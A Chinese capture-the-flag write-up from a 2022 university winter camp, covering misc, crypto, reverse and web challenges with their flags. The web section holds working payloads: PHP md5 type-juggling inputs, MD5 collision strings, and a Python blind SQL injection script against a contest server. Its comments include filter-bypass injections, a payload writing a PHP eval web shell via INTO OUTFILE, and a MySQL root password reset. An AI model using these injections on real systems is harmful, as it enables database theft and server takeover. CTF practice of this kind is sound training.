Rank: 2
这是什么比赛呢?
举办时间:庚子土(季冬)月 丁巳土觜执日 – 辛丑土(季冬)月 壬午木胃执日
福建师范大学NISA战队x厦门理工学院CodeMonster战队举办的2022 Winter Camp
题外话:这场比赛是我上大学期间有史以来最寄吧无语の一场比赛,主要是某队友上半学期为了混分欺骗我们让我们带他拿奖,拿了奖后就跑了😅
我特别看不起那些为了混分而不择手段的人(这里主要针对的是那些说 “你这个比赛能加分吗?”,“能不能带我一下” 之类的人)
Misc
Double Happiness
双倍快乐,压缩包伪加密,直接提出图片
拼图出FLAG
nico
使用stegdetect扫出图片为JPHS隐写,break破解密码得123456
Seek后出flag
NICO{GuLf_WeLc0mE_Y0U}
Crypto
编码方式:Unescape Unicode Prefix: \u
\u0041\u0051\u0045\u0043\u007b\u0037\u0075\u0031\u0061\u005f\u006b\u0067\u005f\u0067\u0070\u0033\u005f\u0068\u0057\u0061\u0069\u004e\u005f\u0074\u0031\u0034\u0074\u007d
工具跑一下即可
Reverse
简单异或,脚本写一下跑一下
a = [74, 64, 77, 75, 87, 91, 73, 64, 79, 67, 65, 73, 88,67, 88, 68, 73, 98, 101, 111, 99, 111, 120, 106, 81]
for i in range(len(a)):
a[i] ^= 44
print(chr(a[i]), end="")
一眼看出flag
http://121.37.5.94:8310/lEvEl_4.php?%4e%49%5f%43%4f%5f=try-your-best! mov rax, 0x101010101010101 push rax mov rax, 0x101010101010101 ^ 0x7b67616c66 xor [rsp], rax mov rdi, rsp xor edx, edx /* 0 */ xor esi, esi /* 0 */ push SYS_open /* 2 */ pop rax syscall mov rdi, rax xor eax, eax /* SYS_read */ mov rdx, 0x101010101010101 /* 32765899414923635 == 0x746869735f6973 */ push rdx mov rdx, 0x1756968725e6872 xor [rsp], rdx pop rdx mov rsi, rsp syscall mov rax, 0x101010101010101 push rax mov rax, 0x101010101010101 ^ 0x7d6d73615f615f xor [rsp], rax mov rsi, rsp push 1 pop rdi push 0x64 pop rdx push SYS_write /* 1 */ pop rax syscall
Web
<?php
//author: Elaine
include('./flag.php');
highlight_file(__FILE__);
$admin = 'false';
$guest = 'true';
extract($_GET);
if (md5($admin) == md5($guest)) {
echo $FLAG;
} else{
echo "nonono!";
}
?>
nonono!
无脑条件
Payload: ?admin=240610708&guest=240610708
NICO{Md5&3xtract_1s_S0_ez!}
S^_^Q\^_\^L
报错注入,sqlmap嗦一下,手工注入就传统报错注入语句稍微改一下即可
关卡目录
Level1: http://121.37.5.94:8310/index.php Level2: http://121.37.5.94:8310/leVe1_two.php Level3: http://121.37.5.94:8310/LevEl3.php Level4: http://121.37.5.94:8310/lEvEl_4.php
http://121.37.5.94:8310/index.php?txw4ever=0.99999999999999999999999
第二关md5的科学计数法漏洞
生成payload即可
jitanglailo=0e00506035745
第三关md5碰撞,找两串md5相同内容不相同的Url编码创一下即可
arr1=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00b%87%24%8E%A1%E8H%B3y%BF%93%B8U%D2%F0e%1Bih%D3%5CD%2A%0B%FF%21%83%FA%AF-4%CF4%9B%F1%EF%5D%0D%3D%C1%EBE%3A%3B%E8U%7C%3Dm%89%DB%11%B7%BFkr%84.%01h%C0%C3%96%DFr%A5%CF%B4%08%F9%8D%E6a3%22%05%A5%C8%8Be%0F2%A7%96F%0CC%DB%1E%C5%B7f%D0%E6t%EE%E9n%B6G%2A%9B9%A8%FAK%B9i%82%94%E1%FC%F3%A0%5D%B3%7F%C2%23I%FE%9F%C9d%84%B2%F1%03&arr2=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00b%87%24%8E%A1%E8H%B3y%BF%93%B8U%D2%F0e%1BihS%5CD%2A%0B%FF%21%83%FA%AF-4%CF4%9B%F1%EF%5D%0D%3D%C1%EBE%3A%3B%E8%D5%7C%3Dm%89%DB%11%B7%BFkr%84.%01%E8%C0%C3%96%DFr%A5%CF%B4%08%F9%8D%E6a3%22%05%A5%C8%8Be%0F2%A7%16F%0CC%DB%1E%C5%B7f%D0%E6t%EE%E9n%B6G%2A%9B9%A8%FAK%B9i%82%14%E1%FC%F3%A0%5D%B3%7F%C2%23I%FE%9F%C9%E4%84%B2%F1%03
第四关把参数url编码下即可
http://121.37.5.94:8310/lEvEl_4.php?%4e%49%5f%43%4f%5f=try-your-best!
最后flag
NICO{phP_1s_R3alLy_Go0d!}
SQL_4
观察题目,属于布尔盲注,sqlmap无果,写exp跑
先观察题目
admin/admin 返回
如果输入注入语句会触发waf
/ 用户和密码框分别输入空格
这时候写个脚本检测一下看哪些语句被过滤
和#
admin/ | admin or 1=1#
输入后返回不一样的内容,根据内容得知要获取的是 me7eorite 用户的密码
直接构造语句一把梭即可
length(database())>6
最终exp
import requests
s = requests.Session()
# burp0_url = "http://49.233.105.150:8004/index.php"
url = "http://121.37.5.94:8322/login.php"
flag = ''
proxies = { "http": None, "https": None}
def exp(i):
# print(i,j)
payload = f"'union/**/select/**/(mid((select/**/passwd/**/from/**/txw4ever.users/**/limit/**/0,1),1,1)/**/like/**/'{i}'#"
print(payload)
#'order/**/by/**/1#
#select/**/locate('t',database())/**/like/**/1
#select mid(database(),1,1) like 't';
#mid((select/**/passwd/**/from/**/txw4ever.users/**/limit/**/1,1),1,1)
#'union/**/select/**/ascii(mid((select/**/passwd/**/from/**/txw4ever.users/**/where/**/passwd),1,1))#
#'union/**/select/**/mid((select/**/passwd/**/from/**/txw4ever.users/**/where/**/passwd),1,1)#
#select/**/passwd/**/from/**/txw4ever.users;
#'(SELECT/**/GROUP_CONCAT(passwd)/**/FROM/**/txw4ever.users/**/like/**/hex('1'))#
#'(SELECT/**/GROUP_CONCAT(password)/**/FROM/**/testdb.admin/**/like/**/hex('1'))#
#select/**/mid(database(),1,1)/**/like/**/'t';(SELECT/**/GROUP_CONCAT(passwd)/**/FROM/**/txw4ever.users/**/like/**/hex('1'));
# 判断数据库长度:||/**/(length(database())>1)# 6位
# nicoCTF
# 猜测数据库名字:||/**/ord(substr(database(),1,1))>14#
# 猜表:||/**/ord(substr(select/**/TABLE_NAME/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=database(),1,1))>10#
# 猜表:||/**/ord(substr(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name,{i},1))>1#
# 猜表长度:||/**/length((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/REGEXP/**/'nicoCTF'/**/limit/**/1,1))>1
# 看有几张表:||/**/length(select count(table_name) from information_schema.tables where table_schema in ("nicoCTF"))>1#
# 看有几张表:||/**/length(select/**/count(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/("nicoCTF"))>1#
# ||/**/substr((select table_name from information_schema.tables where table_schema in ("nicoCTF") limit 1,1),1,1)>{j}
# ||/**/ord(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(\"nicoCTF\")/**/limit/**/1,1),{i},1))>{j}#
# users nico_ctf_user
# ||/**/ord(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/("nicoCTF")/**/&&/**/table_name/**/in/**/("users")/**/limit/**/2,1),{i},1))>={j}
# ||/**/ord(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/("nicoCTF")/**/&&/**/table_name/**/in/**/("nico_ctf_users")/**/limit/**/2,1),{i},1))>={j}
# password code
# ||/**/ord(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/(\"nicoCTF\")/**/&&/**/table_name/**/in/**/(\"nico_ctf_users\")/**/limit/**/1,1),{i},1))>{j}#
# ||/**/ord(substr((select/**/password/**/from/**/nicoCTF.users/**/limit 0,1),{i},1))>{j}#
# ||/**/ord(substr((select/**/username/**/from/**/nicoCTF.nico_ctf_users/**/limit 0,1),{i},1))>{j}#
# ||/**/ord(substr((select username from nicoCTF.users limit 1,1),{i},1))>{j}#
# substr((select username from security.users limit 0,1),1,1)='D'
# ||/**/ord(substr((select/**/username/**/from/**/nicoCTF.nico_ctf_users/**/limit/**/1,1),{i},1))>{j}#
# ||/**/select/**/""/**/INTO/**/OUTFILE/**/"/var/html/ice.php"#
# ||/**/ord(substr((),{i},1))>{j}#
# ||/**/ord(substr((show/**/global/**/variables/**/in/**/("%datadir%")),{i},1)>{j}#
# ||/**/ord(substr(show/**/global/**/variables/**/in/**/("%datadir%"),{i},1))>{j}##
# ||/**/union/**/select/**/1,2,3,4,5,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e/**/into/**/outfile/**/\"/var/www/html/ice.php\"#
# ||/**/ord(substr((system/**/pwd),{i},1))>{j}#
# ||/**/ord(substr(),{
# update/**/user/**/set/**/password=password(\"root\")/**/where/**/user/**/in/**/(\"root\")#
# me7eorite
data = {
"username": "bilala",
"passwd": payload
}
r = s.post(url, data=data, proxies=proxies)
if "wrong password" in r.text:
print(r.text)
return True
else:
return False
list = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','~','!',"@","#","$","%","^","&","*","(",")","_","+","{","}",":","<",">","?",".","/",";","'","[","]","/","*","-","+",'"']
for i in range(len(list)):
if(exp(list[i])):
print(1)
for i in range(1,255):
if(exp(i)):
print(1)
# for i in range(1, 100):
# low = 32
# high = 127
# while (low <= high):
# mid = (low + high)//2
# if (exp(i, mid)):
# low = mid + 1
# else:
# high = mid - 1
# flag += chr((low+high+1)//2)
# print(flag)
其实最主要的就是二分盲注,闲着无聊随便写了一些别的东西
数据库名字
当前的表
字段
密码和用户名
最终语句
select password from nicoCTF.nico_ctf_users limit 0,1;
登录拿flag
flag{202cb96_2ac59075b9_64b07152_d234b70}
